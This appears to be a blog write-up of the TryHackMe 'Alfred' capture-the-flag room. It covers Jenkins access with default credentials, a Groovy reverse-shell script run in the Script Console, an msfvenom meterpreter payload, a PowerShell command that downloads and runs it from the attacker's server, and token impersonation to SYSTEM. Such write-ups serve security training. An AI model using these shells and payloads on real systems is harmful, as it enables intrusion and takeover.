TryHackMe: Alfred Room Writeup

sy is typing
Dec 10, 2020 · 4 min read

Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens. https://www.tryhackme.com/room/alfred

Task 1: Initial Access

How many ports are open? (TCP only)

We do the usual nmap scan here:

export rhost=1.1.1.1 // target machine ip
nmap -sV --script vuln $rhost | tee nmap-$rhost.out
grep open nmap-$rhost.out

3

What is the username and password for the log in panel(in the format username:password)

In the browser, go to $rhost:8080 and we see a login page. Try the first thing that comes to mind, we’re in!

Image for post
Image for post

admin:admin

What is the user.txt flag?

Click around the Jenkins pages. There are more than 1 way to get a reverse shell, I find the easiest is to use the Script Console. (This doesn’t really follow the steps in the task description, which involves creating a new Jenkins build that runs a Windows batch command)

In the left sidebar, navigate to “Manage Jenkins” > “Script Console”, or just go to $rhost:8080/script

Image for post
Image for post
Very inviting, it even has instructions on the type of script to run!

As explained in the page, the script console allows us to run “an arbitrary Groovy script”, nice. Let’s first start a netcat listener.

nc -lvnp 4444

Now let’s google for a groovy script. We’ll find one here (use Alternative 1 which is “more stealthy”). Change the host and port to your values, then paste it in the Script Console and run. Almost immediately, we’ll see a reverse shell in the listener.

Thread.start {
String host="10.0.0.1";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
}
Image for post
Image for post
Image for post
Image for post
I’m BATMAN

Task 2: Switching Shells

What is the final size of the exe payload that you generated?

Let’s generate the payload!

export lhost=1.1.1.1 // your local ip
export rport=4445 // local port
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=$lhost LPORT=$lport -f exe -o alfred.exe
Image for post
Image for post

73802

Task 3: Privilege Escalation

To check which tokens are available, enter the list_tokens -g. … What is the output when you run the getuid command?

Now we need to get a reverse shell again, this time with Metasploit. (Note: the steps here deviate from the task description).

To get the payload onto the remote machine, we need to start a HTTP server. On our local machine, run this:

python3 -m http.server

Then in another session, start Metasploit and create a listener.

use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 1.1.1.1 // your machine ip
set LPORT 4447
run -j

Now in the remote shell, run this to download the payload that we had created earlier (remember to change the host):

powershell -c "(New-Object System.Net.WebClient).Downloadfile('http://1.1.1.1:8000/alfred.exe','alfred.exe')"

Then start it:

powershell -c Start-Process "alfred.exe"

We should now have a metepreter session!

Image for post
Image for post

Activate it, use the incognito module and impersonate the token:

use incognito
impersonate_token "BUILTIN\Administrators"
Image for post
Image for post

NT AUTHORITY\SYSTEM

Read the root.txt file at C:\Windows\System32\config

Now we need to migrate to a root process as described in the task description:

ps services
migrate <uid>
Image for post
Image for post

Since the migration is successful, we should be in the C:\Windows\System32 dir. So let’s just check out the flag!

Image for post
Image for post

Other TryHackMe articles you may like

…and more in my Writeups and CTF Logs Catalogue.

I also write about software engineering topics:

Hi, if you enjoyed this post, I thought that you might also enjoy these t-shirts with code-inspired designs.

Don’t Code Me On That

Code fragments and comments

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store